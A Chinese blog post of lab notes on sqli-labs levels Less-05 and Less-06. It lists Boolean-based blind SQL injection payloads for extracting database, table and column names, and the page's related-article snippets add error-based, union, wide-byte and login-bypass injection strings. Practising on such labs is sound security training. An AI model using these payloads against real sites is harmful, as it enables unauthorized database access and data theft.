sqli-labs靶场笔记(二)

最新推荐文章于 2024-09-01 20:10:28 发布
原创 最新推荐文章于 2024-09-01 20:10:28 发布 · 197 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍如何通过布尔型SQL注入漏洞获取数据库信息,包括确定数据库名称、表名及字段名等关键步骤。

sqli-labs靶场笔记(二)

Less-05【Boolean 注入|'注入】

下面展示 payload

id=1' order by 3 --+	//确定属性列
id=1' and length(database())=8 --+	//确定数据库名长度为8
id=1' and ascii(substr((select database()),1,1))=115 --+	//配合burp得到数据库名
id=-1' or exists(select * from information_schema.columns) --+ 	//判断是否存在information_schema.columns表
id=1' and ascii(substr((select table_name from information_schema.columns where table_schema='security' limit 0,1),1,1))=99 --+	//确定数据库下的表
id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security'  and  table_name='users' limit 0,1),1,1))=99 --+	//确定某表下的属性列

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

猜测表

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

确定数据库为security
在这里插入图片描述

在这里插入图片描述
得到emails表
逐个猜想
在这里插入图片描述

得到referers表
在这里插入图片描述
得到uagents表
在这里插入图片描述
得到users表
在这里插入图片描述

猜测属性列

在这里插入图片描述
得到属性列id
在这里插入图片描述
得到属性列password
在这里插入图片描述
得到属性列username
在这里插入图片描述
在这里插入图片描述
得到username的值
剩下略,自己体会

Less-06【Boolean 注入|"注入】

下面展示 payload

id=1” order by 3 --+	//确定属性列
id=1“ and length(database())=8 --+	//确定数据库名长度为8
id=1” and ascii(substr((select database()),1,1))=115 --+	//配合burp得到数据库名
id=-1“ or exists(select * from information_schema.columns) --+ 	//判断是否存在information_schema.columns表
id=1” and ascii(substr((select table_name from information_schema.columns where table_schema='security' limit 0,1),1,1))=99 --+	//确定数据库下的表
id=1“ and ascii(substr((select column_name from information_schema.columns where table_schema='security'  and  table_name='users' limit 0,1),1,1))=99 --+	//确定某表下的属性列

均为Boolean注入,详细查看Less-05步骤

sqli-labs笔记
Lyn_10086的博客
10-22 331
sqli-lbs笔记:test 2 主要还是参考了《sqlilabs过关手册注入天书》,参考的其他一些各种零散的文章, 链接放在文末。 一、盲注类型 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面,此时,需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 、布尔盲注 主要是通过构造逻辑判断 相关函数:left(),substr(),ascii(),ORD(),MID(),regexp正则,like匹配, 三、基于报错的sql盲注 主要是通过构造payload让信息
sqli-labs学习笔记
最新发布
2301_81574836的博客
03-20 652
sqli-labs学习笔记1
SQLI-LABS修炼笔记
郁离歌丶的博客
03-04 1098
写在前面:今天的重点是盲注。首先介绍一下sql注入截取字符串常用函数有三大法宝。mid(),substr(),left()1.mid()函数MID(column_name,start[,length])如: str="123456" mid(str,2,1) 结果为2Sql用例:(1)MID(DATABASE(),1,1)>’a’,查看数据库名第一位,MID(DATABASE(),2,1)查...
SQLI-LABS学习笔记()
bad36506的博客
09-05 144
逼话少说,如有错误,烦请指出,谢谢 这两天生病,效率很低 第5关 打开页面 发现跟前几题不同,没有直接返回数据.。 加个单引号 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server versio...
SQLi-Labs 修炼手册 (Less-1-10)
会下雪的晴天
08-01 358
0x00 前言 如果你是自己搭建的环境,请使用5.5以上的版本,这样才会有虚拟数据库information,以方便我们去修炼 在注释方面,有--(–空格)、#、/**/三种,常常使用第一种,注入时使用#会让浏览器捉摸不透原因是url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以,HTTP请求中不包括#;/**/是多行注释常用绕过当成空格 在URL中如果在末尾使用--空格,浏...
SQLI-LABS修炼笔记(一)
郁离歌丶的博客
03-03 1222
写在前面:作为一个萌新,想自己搭一个sqli-labs,中间历经了无数艰难,我win10系统用的是xampp,结果搭起来发现php版本太高了,xampp用的是php7以上的,然后自己用docker搭了一个,在ubantu用lamp搭了一个,又用phpstudy搭了一个,在自己服务器上弄了一个233333不说了进入正题。 less-11.找到注入点,发现报错回显。http://43.247.91.2...
sqli-labs靶场练习1-16
weixin_63378918的博客
09-01 1250
id=1" union select count(*),1,concat('~',(select database()),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+ 爆库。id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema= 'security' 爆表。
sqli-labs通关笔记
m0_66169375的博客
04-22 628
limit后面的第一个参数表示从第几+1行开始查,第个参数表示查几条数据。11,利用sql爆出username,password列的值。id=1 and 1=1 回显正常,判断为数字型。9,利用sql爆破出user数据表内的列名。6,爆破出security数据库内的表名。7,如果上一步没有爆出数据库名,也可以。id=1 and 1=2回显错误。eg:3,2 第四行,取两行。2,判断注入类型,字符型,数值型。1,传入id=1 查看页面回显。5,爆破出数据库内的数据库名。4,查数据库名和版本号。
精选资源
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
Sqli-labs靶场搭建(适合新手小白围观)
热门推荐
记录开发和安全学习过程中的点点滴滴
09-12 1万+
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
SQLi-Labs靶场通关笔记(1~21关)
trdtyvu的博客
07-06 3415
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择关卡。
sqli-labs靶场(1-20)通关手册
m0_58168821的博客
07-03 1177
id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,32)),1) --+ --------爆出字段名。发现报错如上图,此时我们判断出,闭合方式中含有单引号,我们假设只有单引号,加上or 1=1 --+
SQLI-LABS修炼笔记(三)
郁离歌丶的博客
03-05 541
写在前面:导入导出相关操作的讲解:1、load_file()导出文件Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。使用条件:A、必须有权限读取并且文件必须完全可读and (select count(*) from mysql.user)>0/* 如果结果返回正常,说明具有读写权限。and (select count(*) from mysql.user)...
SQLI-LABS修炼笔记(五)
郁离歌丶的博客
03-08 866
写在前面:今天介绍的是post注入。自己总结了一些万能密码:1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1'='1'=1 12:1 or '1'='1' or 1=1 13:...
SQL注入(数字型)
Vi_vids的博客
10-20 2132
基本漏洞篇 SQL注入(数字型) SQL注入就是在网站中注入sql语句,使其可以显示一些有用敏感信息 本章描述的数字型即是注入点为数字,采用GET方式 //sql_num.php <?php $conn = mysql_connect('localhost:3306','root','123456')or die('bad!'); //$conn定义一个名字为conn的变量 //使用账号root密码123456 去连接localhost这个mysql服务 mysql_query("SET NAMES
DB2数据库注入
Vi_vids的博客
03-26 1488
db2数据库 这里使用的靶场为墨者学院在线靶场 确定字段数 确定回显位 id=-1 union select 1,2,3,4 from syscat.tables 查看数据库基本信息/爆库 爆表可以使用的表可以是syscat.tables,也可以是syscat.columns、sysibm.sysdummy1 科普时间 sysibm.sysdummy1 表是DB2数据库中的系统表,存放着系统的相关信息 id=-1 union select 1,current schema,current s
sqli-labs靶场笔记(六)
Vi_vids的博客
12-22 328
sqli-labs靶场笔记(六) Less-32【宽字节注入】 下面展示一些 payload。 id=1%df'and 1=1 %23 //判断注入类型 id=1%df'order by 3 %23 //查看属性列个数 id=-1%df'union select 1,user(),database() %23 //查看数据库用户、数据库名称 iid=-1%df'union select 1,group_concat(0x7e,table_name),3 from information_schema.tab
sqli-labs靶场笔记(一)
Vi_vids的博客
12-06 304
sqli-labs靶场笔记(一) Less-01 下面展示一些 会用到的payload。 id=-1' union select 1,user(),database() --+ id=-1' or exist(select * from information_schema_columns) --+ id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='secur
sqli-labs靶场笔记(五)
Vi_vids的博客
12-19 262
sqli-labs靶场笔记(五) Less-17
支持PHP7的sqli-labs靶场介绍
3. sqli-labs靶场sqli-labs是一个非常流行的在线学习平台,它提供了一个模拟的环境,其中包含了多个练习关卡,每个关卡都有一个或多个SQL注入漏洞等待用户发现和利用。通过逐个解决这些关卡,学习者可以掌握SQL...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值